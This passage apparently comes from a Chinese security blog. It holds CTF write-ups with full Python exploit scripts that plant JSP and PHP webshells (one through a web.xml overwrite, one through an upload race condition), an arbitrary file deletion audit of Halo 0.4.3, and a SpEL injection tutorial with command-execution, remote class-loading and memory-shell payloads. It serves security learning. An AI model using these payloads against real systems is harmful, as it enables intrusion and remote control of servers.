&lt;servlet-class&gt;com.ctf.AdminDashboardServlet&lt;/servlet-class&gt; &lt;multipart-config&gt; &lt;max-file-size&gt;10485760&lt;/max-file-size&gt; &lt;max-request-size&gt;20971520&lt;/max-request-size&gt; &lt;file-size-threshold&gt;0&lt;/file-size-threshold&gt; &lt;/multipart-config&gt; &lt;/servlet&gt; &lt;servlet&gt; &lt;servlet-name&gt;BackUpServlet&lt;/servlet-name&gt; &lt;servlet-class&gt;com.ctf.BackUpServlet&lt;/servlet-class&gt; &lt;/servlet&gt; &lt;servlet-mapping&gt; &lt;servlet-name&gt;LoginServlet&lt;/servlet-name&gt; &lt;url-pattern&gt;/login&lt;/url-pattern&gt; &lt;/servlet-mapping&gt; &lt;servlet-mapping&gt; &lt;servlet-name&gt;RegisterServlet&lt;/servlet-name&gt; &lt;url-pattern&gt;/register&lt;/url-pattern&gt; &lt;/servlet-mapping&gt; &lt;servlet-mapping&gt; &lt;servlet-name&gt;DashboardServlet&lt;/servlet-name&gt; &lt;url-pattern&gt;/dashboard/*&lt;/url-pattern&gt; &lt;/servlet-mapping&gt; &lt;servlet-mapping&gt; &lt;servlet-name&gt;AdminDashboardServlet&lt;/servlet-name&gt; &lt;url-pattern&gt;/admin/*&lt;/url-pattern&gt; &lt;/servlet-mapping&gt; &lt;servlet-mapping&gt; &lt;servlet-name&gt;BackUpServlet&lt;/servlet-name&gt; &lt;url-pattern&gt;/backup/*&lt;/url-pattern&gt; &lt;/servlet-mapping&gt; &lt;welcome-file-list&gt; &lt;welcome-file&gt;index.html&lt;/welcome-file&gt; &lt;/welcome-file-list&gt; &lt;/web-app&gt; """ # 2. JSP Webshell (增强版：支持标准输出和错误输出) JSP_SHELL = r"""&lt;%@ page import="java.io.*,java.util.*" %&gt; &lt;pre&gt; &lt;% String cmd = request.getParameter("cmd"); if (cmd != null) { // 使用 /bin/sh -c 兼容管道符和复杂命令 Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", cmd}); InputStream in = p.getInputStream(); Scanner s = new Scanner(in).useDelimiter("\\A"); String output = s.hasNext() ? s.next() : ""; InputStream err = p.getErrorStream(); Scanner sErr = new Scanner(err).useDelimiter("\\A"); String error = sErr.hasNext() ? sErr.next() : ""; out.println(output + error); } %&gt; &lt;/pre&gt;""" # ================= 工具函数 ================= def set_resource_dir(path): """利用 Auth Bypass 设置 resourceDir 为 WebRoot""" print(f"[*] Setting ResourceDir to: {path}") try: # 关键：不带 cookies 触发 Auth Bypass r = requests.post(f"{URL}/admin/challengeResourceDir", data={"new-path": path}, proxies=PROXY) if r.status_code == 200: print("[+] ResourceDir set successfully.") return True else: print(f"[-] Failed to set ResourceDir: {r.status_code} - {r.text}") return False except Exception as e: print(f"[-] Error: {e}") return False def upload_file(filename, content): """模拟文件上传，目标接口通常是 /dashboard/upload 或 /admin/upload""" print(f"[*] Uploading/Writing file: {filename}") try: files = {'file': (filename, content)} # 尝试使用 dashboard upload，如果失败可以换 /admin/upload upload_url = f"{URL}/dashboard/upload" # upload_url = f"{URL}/admin/upload" # 备用接口 r = requests.post(upload_url, files=files, proxies=PROXY) if r.status_code == 200: print(f"[+] File {filename} uploaded.") return True else: # 有时候虽然报 500 或其他错，但文件其实写进去了，检查一下 print(f"[-] Upload status: {r.status_code}. Checking file existence...") check = requests.get(f"{URL}/{filename}", proxies=PROXY) if check.status_code == 200: print(f"[+] Check passed: {filename} exists on server.") return True return False except Exception as e: print(f"[-] Upload Error: {e}") return False def rename_file(old_path, new_path): """利用 rename 接口移动/覆盖文件""" print(f"[*] Renaming {old_path} -&gt; {new_path}") try: r = requests.post(f"{URL}/admin/rename", data={"oldPath": old_path, "newName": new_path}, proxies=PROXY) # 检查返回内容确认是否成功 if r.status_code == 200 and ('"renamed":true' in r.text or 'true' in r.text): print("[+] Rename successful.") return True else: print(f"[-] Rename failed: {r.text}") return False except Exception as e: print(f"[-] Rename Error: {e}") return False def execute_cmd(shell_name, cmd): print(f"[*] Executing command: {cmd}") try: target = f"{URL}/{shell_name}" r = requests.get(target, params={"cmd": cmd}, proxies=PROXY) if r.status_code == 200: print("\n" + "="*20 + " OUTPUT " + "="*20) print(r.text.strip()) print("="*48 + "\n") else: print(f"[-] Execution failed: {r.status_code}") except Exception as e: print(f"[-] Exec Error: {e}") # ================= 主流程 ================= def main(): print("[*] Starting Exploitation...") # 1. 设置 ResourceDir 为 WebRoot (.) # 这是所有文件操作的前提，打破目录限制 if not set_resource_dir("."): return # 2. 上传包含完整配置的恶意 web.xml # 先传为临时文件，防止直接覆盖出错 temp_xml_name = "pwn_web.xml" if not upload_file(temp_xml_name, MALICIOUS_WEB_XML): print("[-] Aborting: Failed to upload web.xml content.") return # 3. 覆盖 WEB-INF/web.xml # 这一步会触发 Tomcat 重载 if not rename_file(temp_xml_name, "WEB-INF/web.xml"): print("[-] Aborting: Failed to overwrite web.xml.") return # 4. 等待 Tomcat 重载配置 (Reload Context) print("[*] Waiting 15 seconds for Tomcat to reload configuration...") time.sleep(15) # 5. 【重要补刀】重载后，ResourceDir 变量可能会重置回默认值 # 所以为了保险，我们再次将其设置为 "."，确保后续上传的 shell 能被正确 rename print("[*] Re-setting ResourceDir to . after reload...") set_resource_dir(".") # 6. 上传并部署 JSP Shell # 先传为 txt 绕过可能存在的后缀检查（虽然 web.xml 已经放行了，但稳健为主） temp_shell_name = "shell.txt" final_shell_name = "shell.jsp" if not upload_file(temp_shell_name, JSP_SHELL): print("[-] Failed to upload shell content.") return if not rename_file(temp_shell_name, final_shell_name): print("[-] Failed to rename shell to .jsp.") return # 7. 执行命令获取 Flag print("[+] Exploit chain completed! Testing RCE...") execute_cmd(final_shell_name, CMD_TO_EXECUTE) if __name__ == "__main__": main() </code></pre> <h1>pcb5-ez_php</h1> <p>开局一个登录框，尝试弱口令和注入都无解，弹窗username or password err</p> <p><code>alert('username or password err');</code></p> <p>遂爆破目录得到/flag.php,/test.txt,/upload.php接口 访问</p> <p><img src="../../../public/pcb5-ez_java/image1-1765879840107-6.png" alt="image1" /></p> <p>将乱码还原得到</p> <pre><code> CTF 比赛日记：小明的一天 今天，小明参加了一个线下 CTF（Capture The Flag）比赛。这是他第一次真正参与这类比赛，虽然之前在网上做过一些 CTF 题目，但和真正的比赛还是有很大的区别。 遇到的挑战与解题过程 1. 密码学挑战（Crypto） 比赛一开始，小明就被一道加密题难住了。 题目特征： 密文看起来像是 Base64 编码，但解码后依然不对劲。 解题思路： 小明回忆起曾学过如何处理 异或加密（XOR），于是决定尝试使用一些常见的异或破解工具。 结果： 最终顺利破解了这一关。 2. Web 安全挑战（Web Security） 接下来是一道 Web 安全题目，是一个简单的登录界面。 题目特征： 登录界面。 攻击尝试： 经过一些基本的 SQL 注入（SQL Injection, SQLi） 尝试后 , 他发现系统对用户名输入没有进行适当的过滤。 结果： 成功执行了 SQL 注入，获取到了管理员的用户名和密码。 3. 二进制逆向挑战（Reverse Engineering, Re） 晚上，小明和队友们讨论了一个二进制逆向题。 题目特征： 题目提供了一个加密的文件，要求找出密钥。 解题过程： 通过 静态分析 和 动态调试 的方法。 结果： 最终找到了密钥并提交了解题结果。 比赛总结与展望 小明觉得整个过程非常充实和有趣。 自我认知： 他意识到自己在 CTF 领域的不足，特别是在一些 二进制逆向 和 网络安全 方面。 收获： 今天的比赛让他学到了很多新的知识，也激发了他继续挑战更高难度题目的动力。 期待下次能够表现得更好！ </code></pre> <p>后面发现无论怎么输入都是弹窗，于是尝试伪造admin。查看<code>cookie</code>，base64还原得到一串序列化字符，测试伪造admin得到 <code>TzoxMjoiU2Vzc2lvblxVc2VyIjoxOntzOjIyOiIAU2Vzc2lvblxVc2VyAHVzZXJuYW1lIjtzOjU6ImFkYWRtaW5taW4iO30=</code></p> <p>将cookie放入进入后台</p> <p><img src="../../../public/pcb5-ez_java/image2-1765879840085-1.png" alt="image2" /></p> <p>通过对功能点的不断测试，有个文件读取功能有提示</p> <p><img src="../../../public/pcb5-ez_java/image3-1765879840108-7.png" alt="image3" /></p> <blockquote> <p>errors log</p> <p>You cannot read .php files try to bypass</p> </blockquote> <p>发现不能读取.php文件，我们尝试绕过</p> <p><img src="../../../public/pcb5-ez_java/image4-1765879840108-9.png" alt="image4" /></p> <p>在flag.php后面加个/，读到flag</p> <p><code>flag{8fee436d-176e-4b69-80ce-3b2ed0eee331}</code></p> <h1>pcb5-Uplssse</h1> <p>同样登入容易一个登录框，不一样的是这次可以注册</p> <p>我们注册一个admin用户发现已存在该用户，于是注册Admin用户注册并登录</p> <p><img src="../../../public/pcb5-ez_java/image5-1765879840108-8.png" alt="image5" /></p> <p>提示只有<code>admin</code>可以上传文件哦</p> <p>我们将cookie解码，同样得到一串序列化字符串 <code>O:4:"User":4:{s:8:"username";s:5:"Admin";s:8:"password";s:6:"123456";s:10:"isLoggedIn";b:1;s:8:"is_admin";i:0;}</code></p> <p>我们将Admin改为admin，is_admin值改为1，base64解码提交</p> <p><code>Tzo0OiJVc2VyIjo0OntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjY6IjEyMzQ1NiI7czoxMDoiaXNMb2dnZWRJbiI7YjoxO3M6ODoiaXNfYWRtaW4iO2k6MTt9</code></p> <p><img src="../../../public/pcb5-ez_java/image6-1765879840108-10.png" alt="image6" /></p> <p>成功登录</p> <p>先随便上传一个文件，发现jpg,jpeg,txt等文件能上传，<code>php</code>被禁</p> <p>得到<code>/var/www/html/tmp/</code></p> <p>安全提示</p> <p>系统会对所有上传文件进行内容安全检测</p> <p>检测过程可能需要几秒钟时间</p> <p>违规文件将被自动删除</p> <p>根据提示系统会对所有上传文件进行内容安全检测，且违规文件将被自动删除 猜测是考文件上传条件竞争</p> <p>用Wappalyzer得出是apache服务器版本<code>2.4.25</code>，同时禁用<code>php</code>，</p> <p>于是尝试上传<code>.htaccess</code>配置文件进行绕过 我们通过upload_test_php_worker，持续不断地上传一个带有恶意载荷的 test.php 文件。 通过trigger_tmp_worker，持续不断地请求服务器上的 <code>/tmp/test.php</code> 文件</p> <p>同时在test.php中写入交互式shell，得到payload</p> <pre><code>import requests import threading import time import sys from concurrent.futures import ThreadPoolExecutor, as_completed TARGET_HOST = "192.168.18.26" TARGET_PORT = 25002 BASE_URL = f"http://{TARGET_HOST}:{TARGET_PORT}" UPLOAD_URL = f"{BASE_URL}/upload.php" COOKIE = "user_auth=Tzo0OiJVc2VyIjo0OntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjQ6InRlc3QiO3M6MTA6ImlzTG9nZ2VkSW4iO2I6MTtzOjg6ImlzX2FkbWluIjtpOjE7fQ==" cookies = {"user_auth": COOKIE.split("=", 1)[1]} # 全局标志：是否已成功写入 shell shell_written = False lock = threading.Lock() # 请求会话（复用连接，提升性能） session = requests.Session() session.cookies.update(cookies) session.headers.update({ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" }) def safe_post(url, files=None, data=None, timeout=5): try: return session.post(url, files=files, data=data, timeout=timeout) except Exception: return None def safe_get(url, timeout=3): try: return session.get(url, timeout=timeout) except Exception: return None def upload_htaccess(): files = { 'file': ('.htaccess', b'Require all granted', 'image/jpeg'), 'upload': (None, '上传文件') } resp = safe_post(UPLOAD_URL, files=files, timeout=6) if resp and resp.status_code &lt; 400: print("[+] .htaccess 上传成功") else: print("[-] .htaccess 上传失败或被拒绝") def upload_test_php_worker(): global shell_written # 使用单引号包裹外层，避免转义；内层用双引号 payload_content = b"&lt;?php fputs(fopen('shell.php', 'w'), '&lt;?php eval($_POST[\"cmd\"]); ?&gt;'); phpinfo(); ?&gt;" while not shell_written: files = { 'file': ('test.php', payload_content, 'image/jpeg'), 'upload': (None, '上传文件') } safe_post(UPLOAD_URL, files=files, timeout=4) time.sleep(0.01) # 避免压垮本地资源 def trigger_tmp_worker(): global shell_written trigger_url = f"{BASE_URL}/tmp/test.php" while not shell_written: resp = safe_get(trigger_url, timeout=2) if resp and resp.status_code == 200: # 判断是否包含 phpinfo 特征 或 至少有 PHP 输出 if b"PHP Version" in resp.content or b"&lt;title&gt;PHP" in resp.content: with lock: if not shell_written: shell_written = True print("\n[!!!] 成功触发 /tmp/test.php！shell.php 应已写入（密码: cmd）") time.sleep(0.02) def exploit_shell(): shell_url = f"{BASE_URL}/tmp/shell.php" test_payload = {"cmd": "echo 'SHELL_READY_12345';"} try: resp = session.post(shell_url, data=test_payload, timeout=6) if resp and "SHELL_READY_12345" in resp.text: print("[+] shell.php 可用！密码参数为 'cmd'") print("[*] 输入命令执行（输入 'exit' 退出）") while True: try: cmd = input("\n[#] $ ").strip() if cmd.lower() in ("exit", "quit"): break if not cmd: continue # 执行系统命令 exec_payload = {"cmd": f"system('{cmd}');"} r = session.post(shell_url, data=exec_payload, timeout=12) if r: # 清理多余 HTML（可选） output = r.text print(output) else: print("[-] 请求无响应") except KeyboardInterrupt: print("\n[!] 中断命令输入") break else: print("[-] shell.php 未生效（可能写入失败或路径错误）") # 尝试直接访问看是否存在 check = safe_get(shell_url) if check and check.status_code == 200: print(" [?] shell.php 存在但无法执行命令（可能 disable_functions）") else: print(" [?] shell.php 不存在") except Exception as e: print(f"[-] 访问 shell.php 出错: {e}") def main(): global shell_written print(f"[+] 目标: {BASE_URL}") print("[*] 正在上传 .htaccess...") upload_htaccess() print("[*] 启动高并发条件竞争（上传 + 触发）...") total_workers = 50 # 总线程数 upload_workers = 35 trigger_workers = 15 with ThreadPoolExecutor(max_workers=total_workers) as executor: futures = [] # 提交上传任务 for _ in range(upload_workers): futures.append(executor.submit(upload_test_php_worker)) # 提交触发任务 for _ in range(trigger_workers): futures.append(executor.submit(trigger_tmp_worker)) # 等待任一成功信号 while not shell_written: time.sleep(0.1) # 取消所有任务（非强制，但停止新任务） print("[*] 条件竞争成功，等待线程收尾...") # 利用 shell exploit_shell() if __name__ == "__main__": try: main() except KeyboardInterrupt: print("\n[!] 用户强制退出") sys.exit(1) except Exception as e: print(f"[!] 脚本异常: {e}") sys.exit(1) </code></pre> <p><img src="../../../public/pcb5-ez_java/image7-1765879840108-11.png" alt="image7" /></p> <p>flag在<code>/flag6f67186d</code></p> <p>最终<code>flag{121b0e889c7949799ff2dec7dedad081}</code></p> https://origin618.github.io/posts/halo%E5%8D%9A%E5%AE%A2%E7%B3%BB%E7%BB%9F%E5%AE%A1%E8%AE%A1/https://origin618.github.io/posts/halo%E5%8D%9A%E5%AE%A2%E7%B3%BB%E7%BB%9F%E5%AE%A1%E8%AE%A1/Halo博客系统审计Wed, 10 Dec 2025 00:00:00 GMT<h1>项目搭建</h1> <p>轻快，简洁，功能强大，使用 Java 开发的博客系统。</p> <table> <thead> <tr> <th>软件名称</th> <th><strong>版本</strong></th> </tr> </thead> <tbody> <tr> <td>操作系统</td> <td>Windows10</td> </tr> <tr> <td>Java</td> <td>JDK1.8_261（https://www.oracle.com/co/java/technologies/javase/javase8-archive-downloads.html，往下滑）</td> </tr> <tr> <td>Maven</td> <td>3.6.3</td> </tr> <tr> <td>IEDA</td> <td>2025.1</td> </tr> </tbody> </table> <p>源码下载地址： https://github.com/halo-dev/halo/releases/tag/v0.4.3</p> <p>下载完成后解压项目文件，使用 IDEA 以 Maven 方式打开该项目即可</p> <p>该系统使用了 H2 Database 作为数据库，不需要像 Mysql 那般操作。</p> <p>进入 <code>src/main/java/cc/ryanc/halo/Application.java </code>代码中启动项目，如下图所示</p> <p><img src="/6aac20cb-8c9b-42a9-817f-0489f0918f9f.png" alt="6aac20cb-8c9b-42a9-817f-0489f0918f9f" /></p> <p>访问上述提供的地址 http://localhost:8090 ，进入安装向导</p> <p><img src="/13be85b1-e8bb-4543-8bae-cb25bd6c1b3c.png" alt="13be85b1-e8bb-4543-8bae-cb25bd6c1b3c" /></p> <p>:::note</p> <ul> <li>如若遇到报错，可能是依赖未正确下载或加载所致。请尝试重启 IDEA</li> <li>如若系统中安装了多个 JDK 版本，请务必前往<code>文件 - 项目结</code>（英文版请参考截图位置），将 JDK 版本设置为 <strong>JDK1.8_291</strong>，如下图所示：</li> </ul> <p>:::</p> <p><img src="/0249ff1d-8a95-48b1-897d-3ea81c1b2350.png" alt="0249ff1d-8a95-48b1-897d-3ea81c1b2350" /></p> <h1>代码审计漏洞挖掘</h1> <p>在 Halo 0.4.3 版本中多个依赖存在 CVE 漏洞，可使用较为新版本的 IDEA 在 pom.xml 处查看</p> <p><img src="/ce676cd7-be8c-4fd3-af90-d3c6b6c9cc73.png" alt="ce676cd7-be8c-4fd3-af90-d3c6b6c9cc73" /></p> <h1>任意文件删除漏洞代码审计</h1> <p>梳理文章功能时，发现后台设置下博客备份功能存在一个删除功能，通过抓包发现是根据文件名进行的</p> <p>删除操作，可能存在任意文件删除漏洞：</p> <p><img src="/ad001902-0f24-4061-9454-c26e9fd01e74.png" alt="ad001902-0f24-4061-9454-c26e9fd01e74" /></p> <p>通过抓包获取到接口名为 <code>/admin/backup/delBackup</code> ，通过关键字一一尝试，最终使用</p> <p><code>delBackup</code> 定位到该接口的 Controller 层代码为 BackupController：</p> <p><img src="/a51bcf5b-0c79-49ee-81ac-0a1c6c1cd0da.png" alt="a51bcf5b-0c79-49ee-81ac-0a1c6c1cd0da" /></p> <p>我们进入 BackupController 层，具体代码位于第 211 行至第 220 行</p> <p><img src="/d749ea4a-b9e8-4e10-8192-f027ad28e7ba.png" alt="d749ea4a-b9e8-4e10-8192-f027ad28e7ba" /></p> <p>第一步，双击213行的filename参数，通过高亮 <code>fileName </code>以及 <code>type </code>参数，在第 215 行处被</p> <p>使用</p> <p><img src="/e11070b8-5061-4e5c-b112-9aca7f721bfa.png" alt="e11070b8-5061-4e5c-b112-9aca7f721bfa" /></p> <p>第二步，分析第 215 行，代码拼接了用户的主目录路径加上 <code>/halo/backup/ </code>加上传递来的</p> <p>type 参数加上传递来的 <code>fileName</code> 参数，最终拼接成一个完整的路径，赋值给 srcPath 参数。其中 type参</p> <p>数是其中一个路径</p> <p><img src="/502b4b8a-b5a2-4fde-964c-54c7dec71803.png" alt="502b4b8a-b5a2-4fde-964c-54c7dec71803" /></p> <p>第三步，通过上图单击 <code>srcPath </code>的高亮显示，可以看到在第 217 行使用了 FileUtil.del 方法对</p> <p><code>srcPath </code>进行了操作。将鼠标悬停在该方法处，可以看到是 hutool 组件下的方法。</p> <p><img src="/303bfb46-8a45-4c4d-a5a0-7f344ea5342a.png" alt="303bfb46-8a45-4c4d-a5a0-7f344ea5342a" /></p> <p>上述两步操作中可以看到，该接口并没有任何防止跨目录的操作，从功能点思考可能会造成任意文件删除漏洞。</p> <p>最后，在第 217 行处打个断点进行测试</p> <p><img src="/19e9adfd-6492-4f9d-8a1a-1614f5b353f7.png" alt="19e9adfd-6492-4f9d-8a1a-1614f5b353f7" /></p> <h2>漏洞验证</h2> <p>在任意文件删除单点漏洞代码审计的最后断点处，我们知道了备份文件的存储路径是C:\Users\powerful\halo\backup\posts</p> <p>我们在C盘下新建一个名为<code>1.txt</code>的文件。点击删除功能点捉包</p> <p><img src="/c13528a4-d115-4fa8-ac3b-729684c24fe9.png" alt="c13528a4-d115-4fa8-ac3b-729684c24fe9" /></p> <p>在代码审计部分，我们知道 type 和 fileName 参数都拼接到了路径中</p> <p>所以这两个参数都可以跨目录实现任意文件删除操作</p> <p><img src="/ffe9b025-e408-45c6-9944-05aa2b6fbbed.png" alt="ffe9b025-e408-45c6-9944-05aa2b6fbbed" /></p> <p>删除成功</p> https://origin618.github.io/posts/java%E7%9A%84spel%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5/https://origin618.github.io/posts/java%E7%9A%84spel%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5/Java的SPEL表达式注入Wed, 05 Nov 2025 00:00:00 GMT<h3>pom.xml引入Spring，直接导入Spring core 等库可能会出现ClassNotFound</h3> <h3>注意：这里使用2.7.18是因为笔者的Java版本是JDK1.</h3> <h1>定界符</h1> <h3>#{} : 花括号内的内容将被解析为SPEL语句</h3> <h3>${} : 单纯的占位符</h3> <h1>T()表达式</h1> <h3>被T()包围的内容会被解析为一个类，比如java.lang.String，java.lang.Runtime</h3> <pre><code>&lt;dependency&gt; &lt;groupId&gt;org.springframework.boot&lt;/groupId&gt; &lt;artifactId&gt;spring-boot-starter-web&lt;/artifactId&gt; &lt;version&gt; 2. 7. 18 &lt;/version&gt; &lt;/dependency&gt; package org.example; import org.springframework.expression.EvaluationContext; import org.springframework.expression.ExpressionParser; import org.springframework.expression.spel.standard.SpelExpressionParser; import org.springframework.expression.spel.support.StandardEvaluationContext; public class SpringSpelTest { public static void main(String[] args) { String cmdStr = "T(java.lang.String)"; ExpressionParser parser = new SpelExpressionParser(); EvaluationContext evaluationContext = new StandardEvaluationContext(); String result = parser.parseExpression(cmdStr).getValue(evaluationContext).toString(); System.out.println(result); } } </code></pre> <h3>运算符类型 运算符</h3> <h3>算数运算 +, -, *, /, %, ^</h3> <h3>关系运算 &lt;, &gt;, ==, &lt;=, &gt;=, lt, gt, eq, le, ge</h3> <h3>逻辑运算 and, or, not,!</h3> <h3>条件运算 ?:(ternary), ?:(Elvis)</h3> <h3>正则表达式 matches</h3> <h3>运算符 符号 文本类型</h3> <h3>等于 == eq</h3> <h3>小于 &lt; lt</h3> <h3>小于等于 &lt;= le</h3> <h3>大于 &gt; gt</h3> <h3>大于等于 &gt;= ge</h3> <h1>运算符</h1> <h1>变量定义和引用</h1> <h3>在SpEL表达式中，变量定义通过EvaluationContext类的setVariable(variableName, value)函数来实现；在表达式中使用”#variableName”</h3> <h3>来引用；除了引用自定义变量，SpEL还允许引用根对象及当前上下文对象：</h3> <h3>#this：使用当前正在计算的上下文；</h3> <h3>#root：引用容器的root对象；</h3> <h3>@something：引用Bean</h3> <h1>无回显命令执行</h1> <h2>ProcessBuilder</h2> <h3>SpEL表达式注入也可以直接通过new的形式初始化一个对象</h3> <h2>Runtime</h2> <h3>两者都能弹出计算机，但是很无奈回显都是形如：java.lang.ProcessImpl@721e0f4f的对象名，而不是命令执行的结果</h3> <h2>ScriptEngine</h2> <h3>同样的也可以用javascript或者nashorn来执行java代码</h3> <h1>远程类加载</h1> <h2>URLClassLoader</h2> <h2>AppClassLoader</h2> <h3>这个感觉没啥用，图一乐</h3> <pre><code>String cmdStr = "new java.lang.ProcessBuilder(new String[]{'calc'}).start()"; String cmdStr = "T(java.lang.Runtime).getRuntime().exec('calc')"; String cmdStr = "new javax.script.ScriptEngineManager().getEngineByName(\"javascript\").eval(\"s= [1];s[0]='calc';java.lang.Runtime.getRuntime().exec(s);\")"; String cmdStr = "new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"s= [1];s[0]='calc';java.lang.Runtime.getRuntime().exec(s);\")"; String cmdStr = "new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL('http://127.0.0.1:8000/')}).loadClass(\"ShellCode\").newInstance()"; String cmdStr = "T(java.lang.ClassLoader).getSystemClassLoader().loadClass('java.lang.Runtime').getRuntime().exec('calc')"; </code></pre> <h2>BCEL字节码注入</h2> <h3>随便编写一个恶意类</h3> <h3>生成BCEL字节码</h3> <h3>SpEL表达式为</h3> <h1>有回显输出</h1> <h2>输出首行</h2> <h2>完整输出</h2> <h2>BufferedReader + Collectors</h2> <h2>Scanner</h2> <h3>useDelimiter是指定分隔符的方法，输入任意内容即可</h3> <h3>以上PAYLOAD如果是通过HTTP请求发包的形式传参，那么就把引号的转义去掉即可，后面也一样</h3> <pre><code>package org.example; import java.io.IOException; public class CMD2 { static { try { Runtime.getRuntime().exec("calc"); } catch (IOException e) { throw new RuntimeException(e); } } } package org.example; import com.sun.org.apache.bcel.internal.Repository; import com.sun.org.apache.bcel.internal.classfile.JavaClass; import com.sun.org.apache.bcel.internal.classfile.Utility; import com.sun.org.apache.bcel.internal.util.ClassLoader; import java.io.IOException; public class BCELtest { public static void main(String[] args) throws IOException, InstantiationException, IllegalAccessException, ClassNotFoundException { JavaClass javaClass = Repository.lookupClass(CMD2.class); String classCode = Utility.encode(javaClass.getBytes(),true); String payload = "$$BCEL$$" + classCode; System.out.println(payload); } } String cmdStr = "T(com.sun.org.apache.bcel.internal.util.JavaWrapper)._main({\"BCEL字节码放这\"})}"; String cmdStr = "new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(\"cmd\", \"/c\", \"whoami\").start().getInputStream(), \"gbk\")).readLine()" String cmdStr = "new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(\"cmd\", \"/c\", \"dir\").start().getInputStream(), \"gbk\")).lines().collect(T(java.util.stream.Collectors).joining(\"\n\"))"; String cmdStr = "new java.util.Scanner(new java.lang.ProcessBuilder(\"cmd\", \"/c\", \"dir\", \".\\\").start().getInputStream(), \"GBK\").useDelimiter(\"asdas\").next()"; </code></pre> <h2>上下文response</h2> <h3>如果Spring的路由方法处理了HttpServletResponse response，我们可以通过操作上下文的response，然后添加Header的形式来回显</h3> <h3>写一个SpringSpelController.java</h3> <h3>这个代码的意思是定义一个路由，然后把SPEL的结果反应到Response里</h3> <h3>原来的SpringSpelTest.java则修改为启动Spring服务器的代码</h3> <h3>修改项目的JVM启动项：-Dserver.port=80，否则tomcat容器将以本地 8080 为默认端口，不好抓包</h3> <h3>抓包发包可以看到，Header多了一个x-cmd，其内容正好是我们的whoami</h3> <pre><code>package org.example; import org.springframework.expression.Expression; import org.springframework.expression.spel.SpelParserConfiguration; import org.springframework.stereotype.Controller; import org.springframework.expression.ExpressionParser; import org.springframework.expression.spel.standard.SpelExpressionParser; import org.springframework.expression.spel.support.StandardEvaluationContext; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.ResponseBody; import javax.servlet.http.HttpServletResponse; @Controller public class SpringSpelController { @RequestMapping({"/spel"}) @ResponseBody public String spel(String payload, HttpServletResponse response) { StandardEvaluationContext context = new StandardEvaluationContext(); context.setVariable("response", response); ExpressionParser parser = new SpelExpressionParser(new SpelParserConfiguration()); Expression exp = parser.parseExpression(payload); return (String) exp.getValue(context); } } package org.example; import java.io.IOException; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; @SpringBootApplication public class SpringSpelTest { public static void main(String[] args) throws IOException { SpringApplication.run(SpringSpelTest.class, args); } } payload=#response.addHeader('x-cmd',new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder("cmd", "/c", "whoami").start().getInputStream(), "gbk")).readLine()) </code></pre> <h3>当然，这样做会导致命令执行的结果存在中文时导致报错，我们可以先把它URLencode一下，或者Base64加密</h3> <h2>内存马</h2> <h3>先把最终payload放出来</h3> <h3>由于是MVC架构，那么想添加路由就必须打内存马，最终目的就是动态加载一个恶意类，并实例化，也就是需要找到一个合适的defineClass</h3> <h3>方法：</h3> <h3>它最好来自org.springframework，这样可以避免引入其他类型</h3> <h3>能够解析base64编码或者url编码的内容</h3> <h3>这里找到了org.springframework.cglib.core.ReflectUtils</h3> <h3>有了defineClass方法，自然就需要一个ClassLoader，因为是MVC架构，自然需要获取当前Spring线程的ClassLoader</h3> <h3>也就是java.lang.Thread.currentThread().getContextClassLoader()</h3> <h3>第一个Payload使用的MLet类实际上是URLClassLoader，它能够加载任意类，虽然长了点但是兼容性没有问题</h3> <h3>最后编写一个恶意类，既然想要添加内存马，那么就需要使用Spring的类，最终的代码如下：</h3> <h3>参考：</h3> <h3>文章 - Spring内存马——Controller/Interceptor构造 - 先知社区</h3> <h3>SpringBoot Interceptor 内存马 - zpchcbd - 博客园</h3> <h3>Spring型内存马 | stoocea's blog</h3> <pre><code>payload=#response.addHeader('x-cmd',T(java.net.URLEncoder).encode(new java.util.Scanner(new java.lang.ProcessBuilder("cmd", "/c", "dir", ".\\").start().getInputStream(), "gbk").useDelimiter("asdas").next())) payload=#response.addHeader('x-cmd',T(java.util.Base64).getEncoder().encodeToString(new java.util.Scanner(new java.lang.ProcessBuilder("cmd", "/c", "dir", ".\\").start().getInputStream(), "GBK").useDelimiter("asdas").next().getBytes())) payload=T(org.springframework.cglib.core.ReflectUtils).defineClass('InceptorMemShell',T(org.springframework.ut il.Base64Utils).decodeFromString('yv66vgAAA....'),new javax.management.loading.MLet(new java.net.URL[ 0 ],T(java.lang.Thread).currentThread().getContextClassLoader())).newInstance() //这里可以用#{}包起来，视情况而定，我这里就不行 payload=T(org.springframework.cglib.core.ReflectUtils).defineClass('InceptorMemShell',T(org.springframework.ut il.Base64Utils).decodeFromString(''),T(java.lang.Thread).currentThread().getContextClassLoader()).newInstance( ) import org.springframework.web.servlet.HandlerInterceptor; import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xsltc.TransletException; import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; </code></pre> <p>import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; import com.sun.org.apache.xml.internal.serializer.SerializationHandler; import org.springframework.web.context.WebApplicationContext; import org.springframework.web.context.request.RequestContextHolder; import org.springframework.web.servlet.ModelAndView; import org.springframework.web.servlet.handler.AbstractHandlerMapping; import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;</p> <p>import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.lang.reflect.Field; import java.util.List;</p> <p>public class InceptorMemShell extends AbstractTranslet implements HandlerInterceptor {</p> <p>static { System.out.println("start"); WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServle t.CONTEXT", 0 ); RequestMappingHandlerMapping mappingHandlerMapping = 